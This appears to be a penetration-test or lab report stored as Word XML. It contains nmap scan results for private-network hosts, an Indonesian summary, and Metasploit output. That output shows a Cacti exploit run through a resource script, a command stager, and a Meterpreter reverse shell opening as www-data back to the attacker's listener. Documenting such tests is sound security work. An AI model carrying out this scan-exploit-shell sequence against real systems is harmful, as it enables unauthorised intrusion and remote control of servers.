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1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12</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Mon Jul  1 19:49:03 2024 as: nmap -sV -sC -Pn --script http-title -iL targets.txt -oN nmap_results.txt</w:t>
        <w:br/>
        <w:t>Nmap scan report for 10.33.102.225</w:t>
        <w:br/>
        <w:t>Host is up (0.0013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Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel</w:t>
        <w:br/>
        <w:br/>
        <w:t>Nmap scan report for 10.33.102.226</w:t>
        <w:br/>
        <w:t>Host is up (0.0013s latency).</w:t>
        <w:br/>
        <w:t>Not shown: 996 closed ports</w:t>
        <w:br/>
        <w:t>PORT     STATE SERVICE      VERSION</w:t>
        <w:br/>
        <w:t>22/tcp   open  ssh          OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)</w:t>
        <w:br/>
        <w:t>80/tcp   open  http         Apache httpd 2.4.52 ((Ubuntu))</w:t>
        <w:br/>
        <w:t>|_http-server-header: Apache/2.4.52 (Ubuntu)</w:t>
        <w:br/>
        <w:t>|_http-title: Login to Cacti</w:t>
        <w:br/>
        <w:t>3000/tcp open  ppp?</w:t>
        <w:br/>
        <w:t xml:space="preserve">| fingerprint-strings: </w:t>
        <w:br/>
        <w:t xml:space="preserve">|   FourOhFourRequest: </w:t>
        <w:br/>
        <w:t>|     HTTP/1.1 404 Not Found</w:t>
        <w:br/>
        <w:t>|     Date: Mon, 01 Jul 2024 12:49:50 GMT</w:t>
        <w:br/>
        <w:t>|     Content-Type: text/plain; charset=utf-8</w:t>
        <w:br/>
        <w:t>|     Content-Length: 47</w:t>
        <w:br/>
        <w:t>|     Connection: close</w:t>
        <w:br/>
        <w:t>|     Cannot GET /nice%20ports%2C/Tri%6Eity.txt%2ebak</w:t>
        <w:br/>
        <w:t xml:space="preserve">|   GetRequest: </w:t>
        <w:br/>
        <w:t>|     HTTP/1.1 404 Not Found</w:t>
        <w:br/>
        <w:t>|     Date: Mon, 01 Jul 2024 12:49:15 GMT</w:t>
        <w:br/>
        <w:t>|     Content-Type: text/plain; charset=utf-8</w:t>
        <w:br/>
        <w:t>|     Content-Length: 12</w:t>
        <w:br/>
        <w:t>|     Connection: close</w:t>
        <w:br/>
        <w:t>|     Cannot GET /</w:t>
        <w:br/>
        <w:t xml:space="preserve">|   HTTPOptions, RTSPRequest: </w:t>
        <w:br/>
        <w:t>|     HTTP/1.1 404 Not Found</w:t>
        <w:br/>
        <w:t>|     Date: Mon, 01 Jul 2024 12:49:20 GMT</w:t>
        <w:br/>
        <w:t>|     Content-Type: text/plain; charset=utf-8</w:t>
        <w:br/>
        <w:t>|     Content-Length: 16</w:t>
        <w:br/>
        <w:t>|     Connection: close</w:t>
        <w:br/>
        <w:t>|     Cannot OPTIONS /</w:t>
        <w:br/>
        <w:t xml:space="preserve">|   Help: </w:t>
        <w:br/>
        <w:t>|     HTTP/1.1 400 Bad Request</w:t>
        <w:br/>
        <w:t>|     Date: Mon, 01 Jul 2024 12:49:15 GMT</w:t>
        <w:br/>
        <w:t>|     Content-Type: text/plain; charset=utf-8</w:t>
        <w:br/>
        <w:t>|     Content-Length: 11</w:t>
        <w:br/>
        <w:t>|     Connection: close</w:t>
        <w:br/>
        <w:t>|     Request</w:t>
        <w:br/>
        <w:t xml:space="preserve">|   Kerberos, TLSSessionReq: </w:t>
        <w:br/>
        <w:t>|     HTTP/1.1 400 Bad Request</w:t>
        <w:br/>
        <w:t>|     Date: Mon, 01 Jul 2024 12:49:40 GMT</w:t>
        <w:br/>
        <w:t>|     Content-Type: text/plain; charset=utf-8</w:t>
        <w:br/>
        <w:t>|     Content-Length: 11</w:t>
        <w:br/>
        <w:t>|     Connection: close</w:t>
        <w:br/>
        <w:t>|     Request</w:t>
        <w:br/>
        <w:t xml:space="preserve">|   LPDString: </w:t>
        <w:br/>
        <w:t>|     HTTP/1.1 400 Bad Request</w:t>
        <w:br/>
        <w:t>|     Date: Mon, 01 Jul 2024 12:49:50 GMT</w:t>
        <w:br/>
        <w:t>|     Content-Type: text/plain; charset=utf-8</w:t>
        <w:br/>
        <w:t>|     Content-Length: 11</w:t>
        <w:br/>
        <w:t>|     Connection: close</w:t>
        <w:br/>
        <w:t>|     Request</w:t>
        <w:br/>
        <w:t xml:space="preserve">|   SSLSessionReq: </w:t>
        <w:br/>
        <w:t>|     HTTP/1.1 400 Bad Request</w:t>
        <w:br/>
        <w:t>|     Date: Mon, 01 Jul 2024 12:49:35 GMT</w:t>
        <w:br/>
        <w:t>|     Content-Type: text/plain; charset=utf-8</w:t>
        <w:br/>
        <w:t>|     Content-Length: 11</w:t>
        <w:br/>
        <w:t>|     Connection: close</w:t>
        <w:br/>
        <w:t>|_    Request</w:t>
        <w:br/>
        <w:t>8181/tcp open  intermapper?</w:t>
        <w:br/>
        <w:t xml:space="preserve">| fingerprint-strings: </w:t>
        <w:br/>
        <w:t xml:space="preserve">|   FourOhFourRequest: </w:t>
        <w:br/>
        <w:t>|     HTTP/1.0 404 Not Found</w:t>
        <w:br/>
        <w:t>|     Content-Type: text/plain; charset=utf-8</w:t>
        <w:br/>
        <w:t>|     Vary: Origin</w:t>
        <w:br/>
        <w:t>|     X-Content-Type-Options: nosniff</w:t>
        <w:br/>
        <w:t>|     Date: Mon, 01 Jul 2024 12:49:35 GMT</w:t>
        <w:br/>
        <w:t>|     Content-Length: 19</w:t>
        <w:br/>
        <w:t>|     page not found</w:t>
        <w:br/>
        <w:t xml:space="preserve">|   GenericLines, Help, Kerberos, LPDString, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie: </w:t>
        <w:br/>
        <w:t>|     HTTP/1.1 400 Bad Request</w:t>
        <w:br/>
        <w:t>|     Content-Type: text/plain; charset=utf-8</w:t>
        <w:br/>
        <w:t>|     Connection: close</w:t>
        <w:br/>
        <w:t>|     Request</w:t>
        <w:br/>
        <w:t xml:space="preserve">|   GetRequest, HTTPOptions: </w:t>
        <w:br/>
        <w:t>|     HTTP/1.0 404 Not Found</w:t>
        <w:br/>
        <w:t>|     Content-Type: text/plain; charset=utf-8</w:t>
        <w:br/>
        <w:t>|     Vary: Origin</w:t>
        <w:br/>
        <w:t>|     X-Content-Type-Options: nosniff</w:t>
        <w:br/>
        <w:t>|     Date: Mon, 01 Jul 2024 12:49:10 GMT</w:t>
        <w:br/>
        <w:t>|     Content-Length: 19</w:t>
        <w:br/>
        <w:t>|_    page not found</w:t>
        <w:br/>
        <w:t>2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :</w:t>
        <w:br/>
        <w:t>==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============</w:t>
        <w:br/>
        <w:t>SF-Port3000-TCP:V=7.80%I=7%D=7/1%Time=6682A5CB%P=x86_64-pc-linux-gnu%r(Get</w:t>
        <w:br/>
        <w:t>SF:Request,9B,"HTTP/1\.1\x20404\x20Not\x20Found\r\nDate:\x20Mon,\x2001\x20</w:t>
        <w:br/>
        <w:t>SF:Jul\x202024\x2012:49:15\x20GMT\r\nContent-Type:\x20text/plain;\x20chars</w:t>
        <w:br/>
        <w:t>SF:et=utf-8\r\nContent-Length:\x2012\r\nConnection:\x20close\r\n\r\nCannot</w:t>
        <w:br/>
        <w:t>SF:\x20GET\x20/")%r(Help,9C,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nDate:\x</w:t>
        <w:br/>
        <w:t>SF:20Mon,\x2001\x20Jul\x202024\x2012:49:15\x20GMT\r\nContent-Type:\x20text</w:t>
        <w:br/>
        <w:t>SF:/plain;\x20charset=utf-8\r\nContent-Length:\x2011\r\nConnection:\x20clo</w:t>
        <w:br/>
        <w:t>SF:se\r\n\r\nBad\x20Request")%r(HTTPOptions,9F,"HTTP/1\.1\x20404\x20Not\x2</w:t>
        <w:br/>
        <w:t>SF:0Found\r\nDate:\x20Mon,\x2001\x20Jul\x202024\x2012:49:20\x20GMT\r\nCont</w:t>
        <w:br/>
        <w:t>SF:ent-Type:\x20text/plain;\x20charset=utf-8\r\nContent-Length:\x2016\r\nC</w:t>
        <w:br/>
        <w:t>SF:onnection:\x20close\r\n\r\nCannot\x20OPTIONS\x20/")%r(RTSPRequest,9F,"H</w:t>
        <w:br/>
        <w:t>SF:TTP/1\.1\x20404\x20Not\x20Found\r\nDate:\x20Mon,\x2001\x20Jul\x202024\x</w:t>
        <w:br/>
        <w:t>SF:2012:49:20\x20GMT\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nC</w:t>
        <w:br/>
        <w:t>SF:ontent-Length:\x2016\r\nConnection:\x20close\r\n\r\nCannot\x20OPTIONS\x</w:t>
        <w:br/>
        <w:t>SF:20/")%r(SSLSessionReq,9C,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nDate:\x</w:t>
        <w:br/>
        <w:t>SF:20Mon,\x2001\x20Jul\x202024\x2012:49:35\x20GMT\r\nContent-Type:\x20text</w:t>
        <w:br/>
        <w:t>SF:/plain;\x20charset=utf-8\r\nContent-Length:\x2011\r\nConnection:\x20clo</w:t>
        <w:br/>
        <w:t>SF:se\r\n\r\nBad\x20Request")%r(TLSSessionReq,9C,"HTTP/1\.1\x20400\x20Bad\</w:t>
        <w:br/>
        <w:t>SF:x20Request\r\nDate:\x20Mon,\x2001\x20Jul\x202024\x2012:49:40\x20GMT\r\n</w:t>
        <w:br/>
        <w:t>SF:Content-Type:\x20text/plain;\x20charset=utf-8\r\nContent-Length:\x2011\</w:t>
        <w:br/>
        <w:t>SF:r\nConnection:\x20close\r\n\r\nBad\x20Request")%r(Kerberos,9C,"HTTP/1\.</w:t>
        <w:br/>
        <w:t>SF:1\x20400\x20Bad\x20Request\r\nDate:\x20Mon,\x2001\x20Jul\x202024\x2012:</w:t>
        <w:br/>
        <w:t>SF:49:40\x20GMT\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConten</w:t>
        <w:br/>
        <w:t>SF:t-Length:\x2011\r\nConnection:\x20close\r\n\r\nBad\x20Request")%r(FourO</w:t>
        <w:br/>
        <w:t>SF:hFourRequest,BE,"HTTP/1\.1\x20404\x20Not\x20Found\r\nDate:\x20Mon,\x200</w:t>
        <w:br/>
        <w:t>SF:1\x20Jul\x202024\x2012:49:50\x20GMT\r\nContent-Type:\x20text/plain;\x20</w:t>
        <w:br/>
        <w:t>SF:charset=utf-8\r\nContent-Length:\x2047\r\nConnection:\x20close\r\n\r\nC</w:t>
        <w:br/>
        <w:t>SF:annot\x20GET\x20/nice%20ports%2C/Tri%6Eity\.txt%2ebak")%r(LPDString,9C,</w:t>
        <w:br/>
        <w:t>SF:"HTTP/1\.1\x20400\x20Bad\x20Request\r\nDate:\x20Mon,\x2001\x20Jul\x2020</w:t>
        <w:br/>
        <w:t>SF:24\x2012:49:50\x20GMT\r\nContent-Type:\x20text/plain;\x20charset=utf-8\</w:t>
        <w:br/>
        <w:t>SF:r\nContent-Length:\x2011\r\nConnection:\x20close\r\n\r\nBad\x20Request"</w:t>
        <w:br/>
        <w:t>SF:);</w:t>
        <w:br/>
        <w:t>==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============</w:t>
        <w:br/>
        <w:t>SF-Port8181-TCP:V=7.80%I=7%D=7/1%Time=6682A5C6%P=x86_64-pc-linux-gnu%r(Get</w:t>
        <w:br/>
        <w:t>SF:Request,BE,"HTTP/1\.0\x20404\x20Not\x20Found\r\nContent-Type:\x20text/p</w:t>
        <w:br/>
        <w:t>SF:lain;\x20charset=utf-8\r\nVary:\x20Origin\r\nX-Content-Type-Options:\x2</w:t>
        <w:br/>
        <w:t>SF:0nosniff\r\nDate:\x20Mon,\x2001\x20Jul\x202024\x2012:49:10\x20GMT\r\nCo</w:t>
        <w:br/>
        <w:t>SF:ntent-Length:\x2019\r\n\r\n404\x20page\x20not\x20found\n")%r(SSLSession</w:t>
        <w:br/>
        <w:t>SF:Req,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/pla</w:t>
        <w:br/>
        <w:t>SF:in;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Reque</w:t>
        <w:br/>
        <w:t>SF:st")%r(GenericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-T</w:t>
        <w:br/>
        <w:t>SF:ype:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400</w:t>
        <w:br/>
        <w:t>SF:\x20Bad\x20Request")%r(HTTPOptions,BE,"HTTP/1\.0\x20404\x20Not\x20Found</w:t>
        <w:br/>
        <w:t>SF:\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nVary:\x20Origin\r\</w:t>
        <w:br/>
        <w:t>SF:nX-Content-Type-Options:\x20nosniff\r\nDate:\x20Mon,\x2001\x20Jul\x2020</w:t>
        <w:br/>
        <w:t>SF:24\x2012:49:10\x20GMT\r\nContent-Length:\x2019\r\n\r\n404\x20page\x20no</w:t>
        <w:br/>
        <w:t>SF:t\x20found\n")%r(RTSPRequest,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\n</w:t>
        <w:br/>
        <w:t>SF:Content-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r</w:t>
        <w:br/>
        <w:t>SF:\n\r\n400\x20Bad\x20Request")%r(Help,67,"HTTP/1\.1\x20400\x20Bad\x20Req</w:t>
        <w:br/>
        <w:t>SF:uest\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x2</w:t>
        <w:br/>
        <w:t>SF:0close\r\n\r\n400\x20Bad\x20Request")%r(TerminalServerCookie,67,"HTTP/1</w:t>
        <w:br/>
        <w:t>SF:\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset</w:t>
        <w:br/>
        <w:t>SF:=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request")%r(TLSSess</w:t>
        <w:br/>
        <w:t>SF:ionReq,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/</w:t>
        <w:br/>
        <w:t>SF:plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Re</w:t>
        <w:br/>
        <w:t>SF:quest")%r(Kerberos,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Ty</w:t>
        <w:br/>
        <w:t>SF:pe:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\</w:t>
        <w:br/>
        <w:t>SF:x20Bad\x20Request")%r(FourOhFourRequest,BE,"HTTP/1\.0\x20404\x20Not\x20</w:t>
        <w:br/>
        <w:t>SF:Found\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nVary:\x20Orig</w:t>
        <w:br/>
        <w:t>SF:in\r\nX-Content-Type-Options:\x20nosniff\r\nDate:\x20Mon,\x2001\x20Jul\</w:t>
        <w:br/>
        <w:t>SF:x202024\x2012:49:35\x20GMT\r\nContent-Length:\x2019\r\n\r\n404\x20page\</w:t>
        <w:br/>
        <w:t>SF:x20not\x20found\n")%r(LPDString,67,"HTTP/1\.1\x20400\x20Bad\x20Request\</w:t>
        <w:br/>
        <w:t>SF:r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20clos</w:t>
        <w:br/>
        <w:t>SF:e\r\n\r\n400\x20Bad\x20Request");</w:t>
        <w:br/>
        <w:t>Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel</w:t>
        <w:br/>
        <w:br/>
        <w:t>Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .</w:t>
        <w:br/>
        <w:t># Nmap done at Mon Jul  1 19:50:42 2024 -- 2 IP addresses (2 hosts up) scanned in 98.54 seconds</w:t>
        <w:br/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br/>
        <w:br/>
        <w:t>Hasil pemindaian menunjukkan bahwa pada alamat IP 10.33.102.212:</w:t>
        <w:br/>
        <w:t>- Port 22/tcp terbuka dengan layanan SSH menggunakan OpenSSH versi 8.2p1 pada Ubuntu.</w:t>
        <w:br/>
        <w:t>- Port 80/tcp terbuka dengan layanan HTTP menggunakan Apache HTTP Server versi 2.4.54 pada Debian, judul halamannya adalah 'Login to Cacti'.</w:t>
        <w:br/>
        <w:t>- Port 8086/tcp terbuka dengan layanan HTTP untuk InfluxDB versi 1.6.4 tanpa judul halaman.</w:t>
        <w:br/>
        <w:t>- Sistem operasi yang terdeteksi adalah Linux.</w:t>
        <w:br/>
        <w:br/>
        <w:t>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12 dan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12 dan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12</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>10.33.102.225</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Running the 'init' command for the database:</w:t>
        <w:br/>
        <w:t>Existing database found, attempting to start it</w:t>
        <w:br/>
        <w:t>Starting database at /home/yoan/snap/metasploit-framework/common/.msf4/db...waiting for server to start.... stopped waiting</w:t>
        <w:br/>
        <w:t>failed</w:t>
        <w:b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Found exploitable local_data_id 15 for host_id 1</w:t>
        <w:br/>
        <w:t>[*] Command Stager progress - 100.00% done (1118/1118 bytes)</w:t>
        <w:br/>
        <w:t>[*] Sending stage (1017704 bytes) to 10.33.102.225</w:t>
        <w:br/>
        <w:t>[*] Meterpreter session 1 opened (10.33.102.224:4444 -&gt; 10.33.102.225:42996) at 2024-07-01 19:53:56 +0700</w:t>
        <w:br/>
        <w:t>resource (exploit_cacti_resource.rc)&gt; sessions -i</w:t>
        <w:br/>
        <w:br/>
        <w:t>Active sessions</w:t>
        <w:br/>
        <w:t>===============</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  Id  Name  Type                   Information            Connection</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --  ----  ----                   -----------            ----------</w:t>
        <w:br/>
        <w:t xml:space="preserve">  1         meterpreter x86/linux  www-data @ 172.24.0.3  10.33.102.224:4444 -&gt; 10.33.102.225:42996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